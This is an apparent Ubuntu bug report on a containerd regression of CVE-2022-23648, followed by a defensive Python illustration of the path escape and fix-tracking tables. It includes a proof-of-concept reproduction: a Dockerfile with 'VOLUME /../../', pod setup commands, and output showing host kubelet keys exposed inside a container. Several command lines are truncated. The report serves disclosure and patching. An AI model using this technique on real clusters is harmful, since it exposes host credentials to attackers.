containerd regression for CVE-2022-23648 in latest version 1.5.9-0ubuntu1~20.04.1
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| containerd (Ubuntu) | Fix Released | Undecided | Paulo Flabiano Smorigo | |
| Focal | Fix Released | Undecided | Paulo Flabiano Smorigo | |
| Impish | Fix Released | Undecided | Paulo Flabiano Smorigo | |
Bug Description
Hi,
CVE-2022-23648 allows leaking files on the host inside containers given an attacker-crafted image if you use containerd's CRI implementation (e.g. Kubernetes). Ubuntu fixed this in `1.5.5-
This also exists on the latest official Ubuntu EKS AMI (us-west-2 is `ami-05146f3491
I reproduced the bug with the following steps:
1. Build the POC docker image with the following `Dockerfile`:
```
FROM debian:latest
VOLUME /../../
```
then tag it as `cve-2022-
2. Launch the AMI we're testing (`ami-05146f349
3. To trick containerd into running, give it a dummy CNI (this is because I'm too lazy to spin up a full EKS cluster)
```
cat <<EOF | sudo tee /etc/cni/
{
  "name": "dummy",
  "plugins": [
    {
    }
  ]
}
EOF
```
then restart containerd via `sudo systemctl restart containerd`
4. Create the static pod so kubelet runs it
```
sudo mkdir -p /etc/kubernetes
apiVersion: v1
kind: Pod
metadata:
  name: poctest
spec:
  containers:
  - name: poctest
    image: <your-registry>
    command: ["/bin/bash", "-c", "--"]
    args: [ "while true; do sleep 30; done" ]
EOF
```
5. Ask kubelet to pick up the static pod, and also ask it to use containerd's CRI and not dockershim
```
sudo snap set kubelet-eks pod-manifest-
sudo snap restart kubelet-eks
```
6. Wait for the container to come up. `sudo ctr -n k8s.io`
```
ubuntu@
CONTAINER IMAGE RUNTIME
209d6f3ddf858df
319c6e9c5c053aa
```
7. Verify if /var/lib/
```
ubuntu@
total 16
drwxr-xr-x 2 root root 4096 May 11 05:09 .
drwxr-xr-x 3 root root 4096 May 11 05:09 ..
-rw-r--r-- 1 root root 2291 May 11 05:02 kubelet.crt
-rw------- 1 root root 1675 May 11 05:02 kubelet.key
```
If the files are there, then it's vulnerable.
Thanks,
Kevin R
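A defender-side illustration of the mechanism in the report above, added here as an example (not code from the bug report or from containerd): it shows why joining a container rootfs with an image volume path containing `..` resolves to a host directory, what a root-clamped resolution looks like instead, and how an image scanner or admission check can flag such VOLUME declarations. The image config, rootfs path and function names are constructed for illustration.

```python
"""Defensive checks around the CVE-2022-23648 trigger (VOLUME /../../)."""
import json
import posixpath

# Constructed image config in the shape of an OCI config.json; the
# "/../../" volume mirrors the Dockerfile in the bug report.
SAMPLE_CONFIG = json.dumps({
    "architecture": "amd64",
    "config": {"Volumes": {"/../../": {}, "/var/lib/data": {},
                           "/srv/app/../../../etc": {}}},
})


def naive_volume_source(rootfs: str, volume: str) -> str:
    """Join rootfs and volume path with plain normalization: '..'
    components walk out of rootfs, so the result may be a host directory."""
    return posixpath.normpath(posixpath.join(rootfs, volume.lstrip("/")))


def clamped_volume_source(rootfs: str, volume: str) -> str:
    """Resolve the volume path against '/' first so '..' can never climb
    above rootfs. Simplified illustration of root clamping, not
    containerd's code."""
    inside = posixpath.normpath(posixpath.join("/", volume))
    return posixpath.normpath(rootfs + inside)


def escapes_rootfs(rootfs: str, volume: str) -> bool:
    """True when the naive join lands outside rootfs."""
    resolved = naive_volume_source(rootfs, volume)
    return not (resolved == rootfs or resolved.startswith(rootfs + "/"))


def suspect_volumes(config_json: str) -> list:
    """Volume declarations with '..' components or non-absolute paths,
    for an image-scanning or admission check."""
    volumes = json.loads(config_json).get("config", {}).get("Volumes") or {}
    return sorted(v for v in volumes
                  if not v.startswith("/") or ".." in v.split("/"))


if __name__ == "__main__":
    rootfs = "/run/containerd/io.containerd.runtime.v2.task/k8s.io/abc/rootfs"
    for vol in ("/../../", "/var/lib/data"):
        state = "escapes" if escapes_rootfs(rootfs, vol) else "ok"
        print(vol, "->", naive_volume_source(rootfs, vol), state)
    print("suspect:", suspect_volumes(SAMPLE_CONFIG))
```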
CVE References
| Field | Change |
|---|---|
| description | updated |
| information type | Private Security → Public Security |
| description | updated |
| containerd (Ubuntu): assignee | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
| containerd (Ubuntu Focal): assignee | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
| containerd (Ubuntu Impish): assignee | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
Yes, it looks like an SRU has superseded the security fix. Can I make this bug public?